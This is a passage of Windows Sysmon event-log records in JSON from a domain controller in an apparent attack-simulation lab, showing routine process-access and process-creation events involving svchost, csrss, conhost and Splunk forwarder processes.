C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6555,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6556,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21DE-5F25-0000-00103B270A00}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21DE-5F25-0000-00103B270A00}","TargetProcessId":"3268","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6557,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21DE-5F25-0000-0010E6260A00}\r\nTargetProcessId: 3984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21DE-5F25-0000-0010E6260A00}","TargetProcessId":"3984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6558,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.399\r\nProcessGuid: {41C8662E-21DF-5F25-0000-0010F62C0A00}\r\nProcessId: 2252\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.399","ProcessGuid":"{41C8662E-21DF-5F25-0000-0010F62C0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6559,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.398\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21DF-5F25-0000-0010F62C0A00}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.398","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21DF-5F25-0000-0010F62C0A00}","TargetProcessId":"2252","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6560,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.398\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21DF-5F25-0000-0010F62C0A00}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.398","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21DF-5F25-0000-0010F62C0A00}","TargetProcessId":"2252","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6561,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6562,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
